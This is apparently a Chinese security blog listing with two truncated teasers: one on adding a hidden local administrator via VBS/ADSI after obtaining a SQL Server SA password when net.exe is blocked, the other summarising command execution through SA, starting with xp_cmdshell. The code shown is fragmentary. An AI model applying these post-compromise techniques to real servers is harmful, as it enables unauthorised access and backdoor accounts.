今天测试这种方法成功添加了一个管理员账号。由于这个文章在网上很多,都找不到原始出处了,就不写原作者了。
在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录 (ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:
set wsnetwork=CreateObject(“WSCRIPT.NETWORK”) 阅读全文
os=”WinNT://”&wsnetwork.ComputerName
转载请注明来源:BK瞬间群
首发Web安全手册
////////////////////////////////////////////////////////////////////////
sa执行命令方法总结
By 无敌小黄瓜
////////////////////////////////////////////////////////////////////////
测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动)
一.xp_cmdshell
EXEC master..xp_cmdshell ‘ipconfig’
阅读全文
